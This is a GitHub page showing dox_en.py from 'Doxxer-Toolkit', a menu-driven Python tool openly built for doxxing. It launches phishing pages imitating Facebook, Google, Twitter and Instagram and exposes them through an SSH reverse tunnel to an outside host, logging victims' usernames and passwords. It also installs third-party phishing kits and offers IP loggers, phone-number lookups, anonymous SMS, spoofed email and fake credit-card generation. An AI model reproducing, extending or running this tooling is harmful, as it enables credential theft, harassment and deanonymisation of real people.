-
Notifications
You must be signed in to change notification settings - Fork 92
/
dox_en.py
963 lines (908 loc) · 28.5 KB
/
dox_en.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
# -*- coding: utf-8 -*-
# Doxxer-Toolkit by Euronymou5
# https://twitter.com/Euronymou51
# Discord: Euronymou5#3155
# LICENSE: MPL-2.0 license
import os
import time
import subprocess
import random
import pyshorteners
import requests
import pyqrcode
import png
from faker import Faker
import webbrowser
from modules import numeros_en, phoneinf_en
Version = "2.6"
class Colores:
red="\033[31;1m"
verde="\033[92m"
azul="\033[94m"
magenta="\033[36m"
amarillo="\033[33m"
os.system("killall php")
os.system("clear")
logo = Colores.red + '''
·▄▄▄▄ ▐▄• ▄ ▐▄• ▄ ▄▄▄ .▄▄▄ ▄▄▄▄▄ ▄▄▌ ▄ •▄ ▪ ▄▄▄▄▄
██▪ ██ ▪ █▌█▌▪ █▌█▌▪▀▄.▀·▀▄ █· •██ ▪ ▪ ██• █▌▄▌▪██ •██
▐█· ▐█▌ ▄█▀▄ ·██· ·██· ▐▀▀▪▄▐▀▀▄ ▐█.▪ ▄█▀▄ ▄█▀▄ ██▪ ▐▀▀▄·▐█· ▐█.▪
██. ██ ▐█▌.▐▌▪▐█·█▌▪▐█·█▌▐█▄▄▌▐█•█▌ ▐█▌·▐█▌.▐▌▐█▌.▐▌▐█▌▐▌▐█.█▌▐█▌ ▐█▌·
▀▀▀▀▀• ▀█▄▀▪•▀▀ ▀▀•▀▀ ▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ▀█▄▀▪ ▀█▄▀▪.▀▀▀ ·▀ ▀▀▀▀ ▀▀▀
By: Euronymou5
_______________
Version: v2.6
_____________
'''
def sher():
os.system("clear")
print(logo)
print('\n[1] Search with Doxxer Toolkit')
print('[2] Sherlock (Program)')
print('[3] Nexfil (Program)')
print('[4] Basic search with socialscan')
print('[00] Back to main menu')
print('[99] Exit')
var = int(input('\n>> '))
if var == 1:
os.system("python3 modules/search_en.py")
elif var == 2:
if os.path.exists('.tools/sherlock'):
user = input('\n[~] Enter the username to search in sherlock: ')
print(' ')
os.system(f"cd .tools/sherlock && python3 sherlock {user}")
else:
print('\n[!] Sherlock is not installed!')
var = input('[?] You want to install sherlock [Y/n]: ')
if var == "Y" or var == "y":
print('\n[~] Installing sherlock...')
os.system("cd .tools && git clone https://github.com/sherlock-project/sherlock && cd sherlock && pip3 install -r requirements.txt")
print('[~] Sherlock installed..')
time.sleep(2)
sher()
elif var == "N" or var == "n":
print('\n[~] Returning to the main menu')
time.sleep(1)
sher()
elif var == 3:
if os.path.exists('.tools/nexfil'):
user = input('\n[~] Enter the username to search in nexfil: ')
print(' ')
os.system(f"cd .tools/nexfil && python3 nexfil.py -u {user}")
else:
print('\n[!] Nexfil is not installed!')
var = input('[?] You want to install nexfil [Y/n]: ')
if var == "Y" or var == "y":
print('\n[~] Instalando nexfil...')
os.system("cd .tools && git clone https://github.com/thewhiteh4t/nexfil && cd nexfil && pip3 install -r requirements.txt")
print('[~] Nexfil installed.')
time.sleep(2)
sher()
elif var == "N" or var == "n":
print('\n[~] Returning to the main menu')
time.sleep(1)
sher()
elif var == 4:
user = input('\n[~] Enter a user to search: ')
os.system(f"socialscan {user} --show-urls")
elif var == 00:
menu()
elif var == 99:
exit()
else:
print('\n[!] Invalid option.')
sher()
def iplog():
os.system("clear")
print(logo)
print('\n[~] Enter an option..')
print('''\n
[1] IPlogger.org
[2] Grabify
[3] Create an IPlogger link
[00] Back to main menu
[99] Exit
''')
opc = int(input('>> '))
if opc == 1:
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
Skd = int(input('>> '))
if Skd == 1:
webbrowser.open('https://iplogger.org/es/')
iplog()
elif Skd == 2:
os.system("termux-open https://iplogger.org/es/")
iplog()
elif Skd == 00:
iplog()
elif Skd == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
iplog()
elif opc == 2:
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
LA = int(input('>> '))
if LA == 1:
webbrowser.open('https://grabify.link/')
iplog()
elif LA == 2:
os.system("termux-open https://grabify.link/")
iplog()
elif LA == 00:
iplog()
elif LA == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
iplog()
elif opc == 3:
os.system("python3 modules/iplogger_en.py")
elif opc == 00:
os.system("clear")
menu()
elif opc == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
print(logo)
iplog()
def fakerr():
print(f'''{Colores.red}\n
[1] Generate fake ipv4
[2] Generate fake phone number
[3] Generate profile of a fake person
[4] Generate User-Agents
[5] Generate fake Credit card
[00] Back to main menu
[99] Exit
''')
fakk = int(input('>> '))
if fakk == 1:
print('\n[~] Generating a fake ipv4...')
time.sleep(2)
ip = ".".join(map(str, (random.randint(0, 255)
for _ in range(4))))
print(f'{Colores.verde}[~] IP Generated: {ip}')
fakerr()
elif fakk == 2:
fake = Faker()
Faker.seed(0)
print('[~] How many times do you want to generate a fake number?')
num = int(input('[~] Enter a number: '))
print('[~] Generating fake phone number...')
time.sleep(1)
for _ in range(num):
print(fake.phone_number())
fakerr()
elif fakk == 3:
fake = Faker()
Faker.seed(0)
print('[~] How many times do you want to generate a fake profile?')
num = int(input('[~] Enter a number: '))
print('[~] Generating a fake profile...')
time.sleep(1)
for _ in range(num):
print(fake.profile())
fakerr()
elif fakk == 4:
fake = Faker()
Faker.seed(0)
print('[~] How many times do you want to generate a user-agent?')
num = int(input('[~] Enter a number: '))
print('[~] Generating a user-anget...')
time.sleep(1)
for _ in range(num):
print(fake.user_agent())
fakerr()
elif fakk == 5:
fake = Faker()
Faker.seed(0)
print('[~] How many times do you want to generate a credit card?')
num = int(input('[~] Enter a number: '))
print('[~] Generating a fake credit card...')
time.sleep(1)
for _ in range(num):
print(fake.credit_card_full())
fakerr()
elif fakk == 00:
os.system("clear")
menu()
elif fakk == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
print(logo)
fakerr()
def geoip():
print('\n[1] Geolocate IP')
print('\n[00] Back to main menu')
print('\n[99] Exit')
MC = int(input('\n>> '))
if MC == 1:
os.system(f"cd .geo && python3 geo_en.py")
elif MC == 00:
menu()
elif MC == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
print(logo)
geoip()
def emailfak():
os.system("clear")
print(logo)
print('\n[~] Enter an option')
print('\n[1] Emkei')
print('\n[2] Anonemail (Anonymouse)')
print('\n[3] Temp-Mail')
print('\n[4] Etemp-Mail')
print('\n[5] TempMail.email')
print('\n[00] Back to main menu')
print('\n[99] Exit')
OP = int(input('>> '))
if OP == 1:
os.system("clear")
print(logo)
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
bruh = int(input('>> '))
if bruh == 1:
webbrowser.open('https://emkei.cz/')
emailfak()
elif bruh == 2:
os.system("termux-open https://emkei.cz/")
emailfak()
elif bruh == 00:
os.system("clear")
print(logo)
emailfak()
elif bruh == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
emailfak()
elif OP == 2:
os.system("clear")
print(logo)
print('\n[1] Open link for linx')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
bruh = int(input('>> '))
if bruh == 1:
webbrowser.open('http://anonymouse.org/anonemail.html')
emailfak()
elif bruh == 2:
os.system("termux-open http://anonymouse.org/anonemail.html")
emailfak()
elif bruh == 00:
os.system("clear")
print(logo)
emailfak()
elif bruh == 99:
exit()
else:
print('[~] Invalid option')
time.sleep(2)
emailfak()
elif OP == 3:
os.system("clear")
print(logo)
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
bruh = int(input('>> '))
if bruh == 1:
webbrowser.open('https://temp-mail.org/es/')
emailfak()
elif bruh == 2:
os.system("termux-open https://temp-mail.org/es/")
emailfak()
elif bruh == 00:
os.system("clear")
print(logo)
emailfak()
elif bruh == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
emailfak()
# Etemp-Mail
elif OP == 4:
os.system("clear")
print(logo)
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Return to main menu')
print('\n[99] Exit')
bruh = int(input('>> '))
if bruh == 1:
webbrowser.open('https://etempmail.com')
emailfak()
elif bruh == 2:
os.system("termux-open https://etempmail.com")
emailfak()
elif bruh == 00:
os.system("clear")
print(logo)
emailfak()
elif bruh == 99:
exit()
# TempMail-email
elif OP == 5:
os.system("clear")
print(logo)
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Return to main menu')
print('\n[99] Exit')
bruh = int(input('>> '))
if bruh == 1:
webbrowser.open('https://tempmail.email')
emailfak()
elif bruh == 2:
os.system("termux-open https://tempmail.email")
emailfak()
elif bruh == 00:
os.system("clear")
print(logo)
emailfak()
elif bruh == 99:
exit()
elif OP == 00:
menu()
elif OP == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
print(logo)
emailfak()
def phishing():
os.system("clear")
print(logo)
print('[1] Using Doxxer Toolkit phishing')
print('[2] Zphisher (Program)')
print('[3] 0ni-Phish (Program) (Spanish only)')
print('[4] MaxPhisher (Program)')
print('[00] Back to main menu')
print('[99] Exit')
var = int(input('\n>> '))
if var == 1:
print('''
[~] Select a language from the page to use:
[1] Spanish
[2] English
''')
lengua = int(input('\n>> '))
if lengua == 1:
print('''
[1] Facebook
[2] Google
[3] Twitter
[4] Instagram
[00] Back to main menu
[99] Exit
''')
YP = int(input('>> '))
if YP == 1:
print(f'\n{Colores.azul}[~] Users will be saved in: Doxxer-Toolkit/.pages/Facebook/usuarios.txt')
print(f'\n{Colores.verde}[~] You can see them with the command: cat Doxxer-Toolkit/.pages/Facebook/usuarios.txt')
print(f'\n{Colores.magenta}[~] To exit press CTRL + C')
print(' ')
cmd = "php -t .pages/Facebook -S localhost:8080 & ssh -R 80:localhost:8080 [email protected]"
p = subprocess.Popen(cmd, shell=True)
a = p.communicate()[0]
elif YP == 2:
print(f'\n{Colores.azul}[~] Users will be saved in: Doxxer-Toolkit/.pages/Google/usuarios.txt')
print(f'\n{Colores.verde}[~] You can see them with the command: cat Doxxer-Toolkit/.pages/Google/usuarios.txt')
print(f'\n{Colores.magenta}[~] To exit press CTRL + C')
print(' ')
cmd = "php -t .pages/Google -S localhost:8080 & ssh -R 80:localhost:8080 [email protected]"
p = subprocess.Popen(cmd, shell=True)
a = p.communicate()[0]
elif YP == 3:
print(f'\n{Colores.azul}[~] Users will be saved in: Doxxer-Toolkit/.pages/Twitter/usuarios.txt')
print(f'\n{Colores.verde}[~] You can see them with the command: cat Doxxer-Toolkit/.pages/Twitter/usuarios.txt')
print(f'\n{Colores.magenta}[~] To exit press CTRL + C')
print(' ')
cmd = "php -t .pages/Twitter -S localhost:8080 & ssh -R 80:localhost:8080 [email protected]"
p = subprocess.Popen(cmd, shell=True)
a = p.communicate()[0]
elif YP == 4:
print(f'\n{Colores.azul}[~] Users will be saved in: Doxxer-Toolkit/.pages/Instagram/usuarios.txt')
print(f'\n{Colores.verde}[~] You can see them with the command: cat Doxxer-Toolkit/.pages/Instagram/usuarios.txt')
print(f'\n{Colores.magenta}[~] To exit press CTRL + C')
print(' ')
cmd = "php -t .pages/Instagram -S localhost:8080 & ssh -R 80:localhost:8080 [email protected]"
p = subprocess.Popen(cmd, shell=True)
a = p.communicate()[0]
elif YP == 00:
menu()
elif YP == 99:
exit()
elif lengua == 2:
print('''
[1] Facebook
[2] Google
[3] Twitter
[4] Instagram
[00] Back to main menu
[99] Exit
''')
YP = int(input('>> '))
if YP == 1:
print(f'\n{Colores.azul}[~] Users will be saved in: Doxxer-Toolkit/.pages/en_pages/facebook/usernames.txt')
print(f'\n{Colores.verde}[~] You can see them with the command: cat Doxxer-Toolkit/.pages/en_pages/facebook/usernames.txt')
print(f'\n{Colores.magenta}[~] To exit press CTRL + C')
print(' ')
cmd = "php -t .pages/en_pages/facebook -S localhost:8080 & ssh -R 80:localhost:8080 [email protected]"
p = subprocess.Popen(cmd, shell=True)
a = p.communicate()[0]
elif YP == 2:
print(f'\n{Colores.azul}[~] Users will be saved in: Doxxer-Toolkit/.pages/en_pages/google_new/usernames.txt')
print(f'\n{Colores.verde}[~] You can see them with the command: cat Doxxer-Toolkit/.pages/en_pages/google_new/usernames.txt')
print(f'\n{Colores.magenta}[~] To exit press CTRL + C')
print(' ')
cmd = "php -t .pages/en_pages/google_new -S localhost:8080 & ssh -R 80:localhost:8080 [email protected]"
p = subprocess.Popen(cmd, shell=True)
a = p.communicate()[0]
elif YP == 3:
print(f'\n{Colores.azul}[~] Users will be saved in: Doxxer-Toolkit/.pages/en_pages/twitter/usernames.txt')
print(f'\n{Colores.verde}[~] You can see them with the command: cat Doxxer-Toolkit/.pages/en_pages/twitter/usernames.txt')
print(f'\n{Colores.magenta}[~] To exit press CTRL + C')
print(' ')
cmd = "php -t .pages/en_pages/twitter -S localhost:8080 & ssh -R 80:localhost:8080 [email protected]"
p = subprocess.Popen(cmd, shell=True)
a = p.communicate()[0]
elif YP == 4:
print(f'\n{Colores.azul}[~] Users will be saved in: Doxxer-Toolkit/.pages/en_pages/instagram/usernames.txt')
print(f'\n{Colores.verde}[~] You can see them with the command: cat Doxxer-Toolkit/.pages/en_pages/instagram/usernames.txt')
print(f'\n{Colores.magenta}[~] To exit press CTRL + C')
print(' ')
cmd = "php -t .pages/en_pages/instagram -S localhost:8080 & ssh -R 80:localhost:8080 [email protected]"
p = subprocess.Popen(cmd, shell=True)
a = p.communicate()[0]
elif YP == 00:
menu()
elif YP == 99:
exit()
elif var == 2:
if os.path.exists('.tools/zphisher'):
os.system("cd .tools && cd zphisher && bash zphisher.sh")
else:
print('\n[!] Zphisher is not installed!')
var = input('[?] You want to install zphisher [Y/n]: ')
if var == "Y" or var == "y":
print('\n[~] Installing zphisher...')
os.system("cd .tools && git clone https://github.com/htr-tech/zphisher && cd zphisher && bash zphisher.sh")
print('[~] Zphisher installed.')
time.sleep(1)
phishing()
elif var == "N" or var == "n":
print('\n[~] Back to main menu')
time.sleep(1)
phishing()
elif var == 3:
if os.path.exists('.tools/0ni-Phish'):
os.system(f"cd .tools/0ni-Phish && python3 0ni.py")
else:
print('\n[!] 0ni-Phish is not installed!')
var = input('[?] You want to install 0ni-Phish [Y/n]: ')
if var == "Y" or var == "y":
print('\n[~] Instalando 0ni-Phish...')
os.system("cd .tools && git clone https://github.com/Euronymou5/0ni-Phish")
print('[~] 0ni-Phish installed.')
time.sleep(2)
phishing()
elif var == "N" or var == "n":
print('\n[~] Back to main menu')
time.sleep(1)
phishing()
# MaxPhisher
elif var == 4:
if os.path.exists('.tools/MaxPhisher'):
os.system(f"cd .tools/MaxPhisher && python3 maxphisher.py")
else:
print('\n[!] MaxPhisher is not installed!')
var = input('[?] You want to install MaxPhisher [Y/n]: ')
if var == "Y" or var == "y":
print('\n[~] Installing MaxPhisher...')
os.system("cd .tools && git clone https://github.com/KasRoudra/MaxPhisher && pip3 install -r MaxPhisher/files/requirements.txt")
print(Colores.verde + '\n[~] MaxPhisher installed.')
time.sleep(2)
phishing()
elif var == "N" or var == "n":
print('\n[~] Returning to the main menu')
time.sleep(1)
phishing()
## return
elif var == 00:
menu()
elif var == 99:
exit()
def sms():
print('\n[1] Send an anonymous sms using TextBelt')
print('\n[00] Back to main menu')
print('\n[99] Exit')
YR = int(input('>> '))
if YR == 1:
print('[~] Example: +14322009740')
print(f'\n{Colores.azul}[!] Remember that you can only send 1 message per day')
numero = input(f'{Colores.red}[~] Enter the phone number: ')
mess = input('[~] Enter the message you want to send:')
resp = requests.post('https://textbelt.com/text', {
'phone': f'{numero}',
'message': f'{mess}',
'key': 'textbelt',
})
print(resp.json())
print('[~] Message sent.')
input('[~] Press enter to continue...')
os.system("clear")
print(logo)
sms()
elif YR == 00:
menu()
elif YR == 99:
exit()
def numero():
print('\n[1] RevealName (Page)')
print('[2] Get information using Numverify (API)')
print('[3] Get information using the Phonenumbers module')
print('[4] Phoneinfoga (Tool)')
print('[00] Back to main menu')
print('[99] Exit')
var = int(input('\n>> '))
if var == 1:
print('\n[1] Open link for linux')
print('[2] Open link for termux')
var2 = int(input('>> '))
if var2 == 1:
webbrowser.open('https://www.revealname.com/')
numero()
elif var2 == 2:
os.system("termux-open https://www.revealname.com/")
numero()
elif var == 2:
numeros_en.inicio()
elif var == 3:
print('\n[~] Example: +19087654321')
phone_number = str(input('[~] Enter the phone number: '))
try:
import phonenumbers
from phonenumbers import geocoder, carrier, timezone
phone = phonenumbers.parse(phone_number)
international = phonenumbers.format_number(phone, phonenumbers.PhoneNumberFormat.INTERNATIONAL)
countrycode = international.split(' ')[0]
country = geocoder.country_name_for_number(phone, 'en')
location = geocoder.description_for_number(phone, 'en')
carrierr = carrier.name_for_number(phone, 'en')
print(f'\n[~] International format: {international}')
print(f'[~] Country name: {country} ({countrycode})')
print(f'[~] City / Province: {location}')
print(f'[~] Carrier: {carrierr}')
for time in timezone.time_zones_for_number(phone):
print(f'[~] Time zone: {time}')
print('\n[~] Full scan.')
except ImportError:
print(f'\n{Colores.azul}[!] Phonenumbers module not found!')
print('[~] Use the pip3 install phonenumbers command')
time.sleep(2)
print(f'{Colores.red}[~] Returning to the main menu...')
time.sleep(1)
numero()
elif var == 4:
phoneinf_en.install()
elif var == 00:
menu()
elif var == 99:
exit()
def osintpa():
os.system("clear")
print(logo)
print('''\n
[1] Osintframework
[2] Osint Techniques
[3] Awesome Osint
[00] Return to main menu
[99] Exit
''')
osint = int(input('>> '))
if osint == 1:
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
elejir99 = int(input('>> '))
if elejir99 == 1:
webbrowser.open('https://osintframework.com/')
osintpa()
elif elejir99 == 2:
os.system("termux-open https://osintframework.com/")
osintpa()
elif elejir99 == 00:
osintpa()
elif elejir99 == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
osintpa()
elif osint == 2:
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
elejir99 = int(input('>>: '))
if elejir99 == 1:
webbrowser.open('https://www.osinttechniques.com/')
osintpa()
elif elejir99 == 2:
os.system("termux-open https://www.osinttechniques.com/")
elif elejir99 == 00:
osintpa()
elif elejir99 == 99:
exit()
elif osint == 3:
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
elejir99 = int(input('>>: '))
if elejir99 == 1:
webbrowser.open('https://github.com/jivoi/awesome-osint')
osintpa()
elif elejir99 == 2:
os.system("termux-open https://github.com/jivoi/awesome-osint")
elif elejir99 == 00:
osintpa()
elif elejir99 == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
osintpa()
elif osint == 00:
menu()
elif osint == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
osintpa()
def qrcodigo():
os.system("clear")
print(logo)
print('\n[~] Enter a text or url to convert to qr code')
s = input('[~] Enter a text: ')
n = input('[~] Input the image name: ')
d=n+".png"
url=pyqrcode.create(s)
url.show()
url.png(d, scale =40)
print(f'{Colores.azul}[~] Image saved in the Doxxer-Toolkit folder with the name: {n}.png')
ll = input(f'{Colores.red}[?] Do you want to return to the main menu [Y/n]: ')
if ll == "Y" or ll == "y":
menu()
elif ll == "N" or ll == "n":
print('[~] Exiting...')
time.sleep(1)
exit()
else:
print('[!] Error')
time.sleep(2)
qrcodigo()
def cortarlink():
os.system("clear")
print(logo)
print(' ')
print('\n[1] Cutt.ly (Requires API Key)')
print('\n[2] Shorturl')
print('\n[3] n9.cl')
print('\n[4] xurl.es')
print('\n[5] TinyURL (API)')
print('\n[6] Chilp.it')
print('\n[7] Clck.ru')
print('\n[8] Da.gd')
print('\n[9] Is.gd')
print('\n[00] Back to main menu')
print('\n[99] Exit')
cortarel = int(input('>> '))
if cortarel == 1:
print("[~] If you don't have a Cuttly API Key you need to create an account")
key = input('[~] Enter your Cuttly API key: ')
s = pyshorteners.Shortener(api_key=key)
url1 = input('[~] Link: ')
print(f'{Colores.azul} Shortened link:', s.cuttly.short(url1))
elif cortarel == 2:
os.system("clear")
print(logo)
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
shorurl = int(input('>> '))
if shorurl == 1:
webbrowser.open('https://shorturl.com/')
cortarlink()
elif shorurl == 2:
os.system("termux-open https://shorturl.com/")
elif shorurl == 00:
os.system("clear")
print(logo)
cortarlink()
elif shorurl == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
print(logo)
cortarlink()
elif cortarel == 3:
os.system("clear")
print(logo)
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
ncl = int(input('>> '))
if ncl == 1:
webbrowser.open('https://n9.cl/es')
cortarlink()
elif ncl == 2:
os.system("termux-open https://n9.cl/es")
elif ncl == 00:
os.system("clear")
print(logo)
cortarlink()
elif ncl == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
print(logo)
cortarlink()
elif cortarel == 4:
os.system("clear")
print(logo)
print('\n[1] Open link for linux')
print('\n[2] Open link for termux')
print('\n[00] Back to main menu')
print('\n[99] Exit')
xurl = int(input('>> '))
if xurl == 1:
webbrowser.open('https://www.xurl.es/')
cortarlink()
elif xurl == 2:
os.system("termux-open https://www.xurl.es/")
elif xurl == 00:
os.system("clear")
print(logo)
cortarlink()
elif xurl == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
print(logo)
cortarlink()
elif cortarel == 5:
url = input('[~] Link: ')
s = pyshorteners.Shortener()
print(f'{Colores.azul}[~] Shortened link:', s.tinyurl.short(url))
time.sleep(2)
elif cortarel == 6:
url = input('[~] Link: ')
s = pyshorteners.Shortener()
print(f'{Colores.azul}[~] Shortened link:', s.chilpit.short(url))
elif cortarel == 7:
url = input('[~] Link: ')
s = pyshorteners.Shortener()
print(f'{Colores.azul}[~] Shortened link:', s.clckru.short(url))
elif cortarel == 8:
url = input('[~] Link: ')
s = pyshorteners.Shortener()
print(f'{Colores.azul}[~] Shortened link:', s.dagd.short(url))
elif cortarel == 9:
url = input('[~] Link: ')
s = pyshorteners.Shortener()
print(f'{Colores.azul}[~] Shortened link:', s.isgd.short(url))
elif cortarel == 00:
menu()
elif cortarel == 99:
exit()
def menu():
os.system("clear")
print(logo)
print(Colores.red + '''
[~] Welcome to Doxxer Toolkit!
[1] IPloggers
[2] Geolocate IP
[3] Get information from a phone number
[4] Phishing
[5] SMS
[6] Anonymous emails
[7] User search
[8] Generate fake information
[9] OSINT Pages
[10] Link shorteners
[11] Generate qr code
[12] OSINT Email (BETA)
[98] Update checker
[99] Exit
''')
elejir = int(input('\n>> '))
if elejir == 1:
iplog()
elif elejir == 2:
geoip()
elif elejir == 3:
numero()
elif elejir == 4:
phishing()
elif elejir == 5:
sms()
elif elejir == 6:
emailfak()
elif elejir == 7:
sher()
elif elejir == 8:
fakerr()
elif elejir == 9:
osintpa()
elif elejir == 10:
cortarlink()
elif elejir == 11:
qrcodigo()
elif elejir == 12:
os.system("python3 modules/emails_en.py")
elif elejir == 98:
version = requests.get('https://raw.githubusercontent.com/Euronymou5/Doxxer-Toolkit/main/version.txt')
if version.status_code == 200:
c = version.text
ola = c.strip()
if Version == ola:
print(f'\n{Colores.verde}[~] No versions available.')
m = input(f'\n{Colores.red}[~] Press enter to continue...')
menu()
else:
print(f'\n{Colores.verde}[~] A new version is available: {ola}')
m = input(f'\n{Colores.red}[~] Press enter to continue...')
menu()
elif elejir == 99:
exit()
else:
print('[~] Invalid option.')
time.sleep(2)
os.system("clear")
menu()
if __name__ == "__main__":
menu()